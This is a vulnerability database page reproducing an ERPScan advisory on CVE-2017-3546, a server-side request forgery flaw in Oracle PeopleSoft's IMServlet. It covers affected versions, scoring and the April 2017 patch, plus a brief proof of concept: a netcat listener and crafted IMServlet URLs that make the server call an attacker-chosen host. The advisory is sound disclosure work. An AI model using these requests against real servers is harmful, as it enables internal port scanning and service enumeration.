Vulners
Lucene search
Oracle PeopleSoft ToolsRelease / ToolsReleaseDB / HCM SSRF Vulnerabilities
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Oracle PeopleSoft - Server-Side Request Forgery Vulnerability | 20 May 201700:00 | – | zdt |
 | Oracle PeopleSoft Enterprise PeopleTools Unauthorized Operation Vulnerability | 27 Apr 201700:00 | – | cnvd |
 | CVE-2017-3546 | 24 Apr 201719:00 | – | cve |
 | CVE-2017-3546 | 24 Apr 201719:00 | – | cvelist |
 | Oracle PeopleSoft - Server-Side Request Forgery | 19 May 201700:00 | – | exploitdb |
 | SSRF in PeopleSoft IMServlet | 23 Dec 201600:00 | – | erpscan |
 | EUVD-2017-12666 | 7 Oct 202500:30 | – | euvd |
 | Oracle PeopleSoft - Server-Side Request Forgery | 19 May 201700:00 | – | exploitpack |
 | CVE-2017-3546 | 24 Apr 201719:59 | – | nvd |
 | Oracle Critical Patch Update Advisory - April 2017 | 18 Apr 201700:00 | – | oracle |
10
Application: Oracle PeopleSoft
Versions Affected: ToolsRelease: 8.55.03; ToolsReleaseDB: 8.55;
PeopleSoft HCM 9.2
Vendor URL: http://oracle.com
Bugs: SSRF
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Author: Roman Shalymov (ERPScan)
Description
1. ADVISORY INFORMATION
Title:[ERPSCAN-17-022] SSRF in PeopleSoft IMServlet
Advisory ID: [ERPSCAN-17-022]
Risk: high
CVE: CVE-2017-3546
Advisory URL: https://erpscan.com/advisories/erpscan-17-022-ssrf-peoplesoft-imservlet/
Date published: 18.04.2017
Vendors contacted: Oracle
2. VULNERABILITY INFORMATION
Class: SSRF
Impact: cross-site port attack, service enumeration
Remotely Exploitable: yes
Locally Exploitable: yes
CVSS Information
CVSS Base Score v3: 8.0 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) High (H)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Changed (C)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High (H)
A : Impact to Availability High (H)
3. VULNERABILITY DESCRIPTION
An attacker can force a vulnerable server to trigger malicious
requests to third-party servers or to internal resources. This
vulnerability can then be leveraged to launch specific attacks such as
a cross-site port attack, service enumeration, and various other
attacks.
4. VULNERABLE PACKAGES
ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, implement Oracle CPU April 2017
6. AUTHOR
Roman Shalymov
7. TECHNICAL DESCRIPTION
PoC
Run netcat
1. nc -l -p # on some host
In browser open the following links
http://PPLSOFTSRV:8000/IMServlet?Method=CONNECT
http://PPLSOFTSRV::8000/IMServlet?Method=GOOGLE_PRESENCE&im_to_user=abc&im_server_name=GOOGLE&im_server=SOMEHOST:OPEN_PORT/?param=var%23"
Read response in netcat
GET /?param=var HTTP/1.1
User-Agent: Java1.7.0_95
Host: SOMEHOST:OPEN_PORT
Accept: text/html, image/gif, image/jpeg, /; q=.2
Connection: Keep-Alive
# 0day.today [2018-04-06] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Apr 2017 00:00Current
6.9Medium risk
Vulners AI Score6.9
EPSS0.02322